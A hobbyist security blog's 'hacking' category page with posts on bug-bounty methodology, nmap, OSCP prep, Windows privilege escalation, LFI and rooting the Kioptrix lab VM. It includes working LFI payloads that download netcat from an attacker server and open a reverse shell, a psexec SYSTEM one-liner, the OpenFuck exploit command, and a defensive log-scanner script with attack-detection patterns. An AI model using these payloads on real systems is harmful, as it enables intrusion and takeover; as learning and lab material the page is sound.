
Category: hacking

  • The Bug Hunter’s Methodology V4

    The Bug Hunter’s Methodology V4

    Since I am participating in Bugcrowd’s October Challenge Month I thought I would present to you the ever awesome @jhaddix’s bug hunter methodology talk from this year’s DefCon Red Team Village. He’s been giving and revising this talk for many years and this is an awesome version. As I work on my own project for the challenge, I am just following along with the methods in the video, and it’s really upped my recon game. Supposedly there’s a second part of the talk on application testing, but I haven’t been able to find it yet. Word to the wise, if you want to get into bug bounty, follow Jason Haddix closely.

  • Nmap Cheatsheet

    Nmap Cheatsheet

    Here’s a great nmap cheat sheet from Nathan House of StationX. I’ve taken some of his courses and found them to be a huge value in the cost to knowledge gained ratio. He’s also very helpful when you run into snags. If you really want to dive into nmap for hacking, check out the NSE scripting engine. Start with nmap -sV -sC 192.168.1.1 and then maybe check here.

  • Hacker Toy

    Hacker Toy

    Ohh man, must have this little hacker toy currently on kickstarter. All the wireless protocols gamified with a cute dolphin avatar. This is both toy and tool. Everything from IR emulation to RFID badge cloning. Yes guys.

    inspired by the pwnagotchi

  • Defcon SafeMode Playlist

    Defcon SafeMode Playlist

    Well I missed DEF CON yet again, but the videos are up and I’m going to spend my weekend attending virtual talks. Here’s the virtual playlists, but I really wish I’d done some of the interactive content. Maybe next year.

  • @TJ Null’s OSCP prep

    @TJ Null’s OSCP prep

    If you are like me, working your way through the PWK and OSCP, there are worse ways to spend your time than @TJ Null’s playlist on YouTube. Recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu; it’s 10 Euros a month for unlimited legal online practice. It’s worth it.

  • Hacker vs Economy

    Hacker vs Economy

    Not my image and no source available (probably from reddit)
    Started programming trading bots a couple of months ago and got a second one finished. For this one I used the robin-stocks api wrapper to interface with robinhood. The first is a crypto trading bot on the cex exchange. So far no profits, but (I think?) the idea is sound? Going to let them run and see if profits are to be had. Maybe patience will be a virtue here.

  • Simple Windows Privesc Admin to System

    Simple Windows Privesc Admin to System

    This will be short and sweet, and I only post it because it’s hard to find via Google but should be base knowledge for any hacker. SysInternals is your friend. If it’s on the box or you can drop it there, it gives pretty complete control at a very granular level. Even if you drop one or two of the tools rather than the whole suite, it makes privesc a breeze. For example, if you have admin and need SYSTEM: psexec -i -s "cmd.exe" and that is all. A pretty short and easy to read one-liner and a good tool for the arsenal.

  • Some thoughts on LFI

    Some thoughts on LFI

    Going over some really interesting stuff today on file includes and ran a couple neat exploits on php running on a windows 10 box. LFI/RFI is deadly. Sooo many ways to pop a shell if the url includes ?file=

    My favorite of the day was using a PHP wrapper to pass a command to the page, which ended up letting me execute any arbitrary command on Windows. It works like this: the page passes whatever is in the file parameter to an include. So you pass ?file=data:text/plain,<?php echo shell_exec("Any random command and parameters") ?> in the URL and boom, command execution. You can use this to request http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22certutil%20-urlcache%20-split%20-f%20%27http://<attack_server>/nc.exe%27%22)%20?%3E

    This places netcat on the system. Then you start a netcat listener on your attack box and visit the URL:

    http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22nc.exe%20-nv%20<Attacker IP>%20<Your listener port>%20-e%20cmd.exe%22)%20?%3E

    Boom. Interactive reverse shell as the php user from visiting 2 URLs in the browser. Easy win.

    Note: the percent-encoding is needed for some browsers, but since you are quoting your command string, it may not be necessary, as the browser will handle URL encoding on its own.
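    From the defender’s side, here is an added example (not from the original post) that spots the data: wrapper trick above, plus the other PHP stream wrappers, remote URLs and traversal sequences that make a file parameter dangerous, by scanning web-server access logs; the log lines, hosts and IPs are constructed for the demo.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format, trimmed); the
# hosts and IPs are made up for this demo and are not from the original post.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:12:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2020:12:00:02 +0000] "GET /index.php?file=data:text/plain,%3C?php%20echo%20shell_exec(%22whoami%22)%20?%3E HTTP/1.1" 200 80
203.0.113.7 - - [10/Oct/2020:12:00:03 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2020:12:00:04 +0000] "GET /index.php?file=..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 300
203.0.113.7 - - [10/Oct/2020:12:00:05 +0000] "GET /index.php?file=http://198.51.100.1/shell.txt HTTP/1.1" 200 10
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
# Stream wrappers and remote schemes that turn an include() into code execution
# or source disclosure when they reach the `file` parameter.
WRAPPER_RE = re.compile(
    r'^(data|php|expect|phar|zip|glob|file|compress\.zlib|https?|ftps?):', re.I)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def classify_file_param(value):
    """Return a short reason if the value looks like an LFI/RFI payload, else None."""
    decoded = unquote(unquote(value))  # second pass catches double-encoded payloads
    if WRAPPER_RE.match(decoded.lstrip()):
        return "stream-wrapper:" + decoded.split(":", 1)[0].strip().lower()
    if TRAVERSAL_RE.search(decoded):
        return "path-traversal"
    if "<?php" in decoded.lower():
        return "inline-php"
    return None

def scan_log(text, param="file"):
    """Return (ip, timestamp, reason, decoded value) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query  # parse_qs percent-decodes once
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            reason = classify_file_param(raw)
            if reason:
                hits.append((m.group("ip"), m.group("ts"), reason, raw))
    return hits
```

    Running scan_log(SAMPLE_LOG) flags four of the five constructed requests; only the plain about.php include passes.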

  • Practical Ethical Hacking Course Completed

    Practical Ethical Hacking Course Completed

    I just finished an amazing hacking course by TheCyberMentor on udemy. It’s a great deal and provides a really practical introduction to pentesting by a professional. I highly recommend it. Woot!


  • Kioptrix Level 1 easy root

    Kioptrix Level 1 easy root

    I’m taking The Cyber Mentor’s Practical Ethical Hacking Course on Udemy and during the scanning and enumeration chapter, we started scanning Kioptrix Level 1. I’ve played around with Kioptrix before and was already prepared to root the machine in a quick two-step, even though that’s not part of the section. To do this root, you’ll need a VMware player to run Kioptrix level one, which you can download from VulnHub. Get it running and find the IP address. I had a little difficulty with this as I couldn’t just pick it up with netdiscover on my network and had to do an nmap ping scan to discover hosts on my vmnet8 interface rather than my local network. Once I had the IP I poked around a bit, looked at the default webpage the server was hosting, ran dirbuster etc, but really got into it running nikto. Although an nmap scan showed an smb share hanging out, which is usually where I’d start probing, nikto showed this:

    Wait what? I can pop a shell? Let’s look up the vuln.

    Evidently these are way way way outdated versions of Apache and mod_ssl, with a vuln that goes back to 2002. Also this sounds familiar. I’ve already exploited this on a box somewhere and have the exploit on my Kali box. For whatever reason this isn’t already implemented in Metasploit, but exploit code is available on Exploit-DB and it’s called OpenFuck. Classy, I know. It’s in C and needs to be compiled with gcc to run, but I already had it from the last time I used it. ./OpenFuck 0x6b 172.16.XXX.XXX 443 -c 40 and what do I get?

    Well I’m root already, no pivoting or privesc, just an easy rooted box. While I’m here I better grab some treasure.

    Hashes to crack for later! Fun!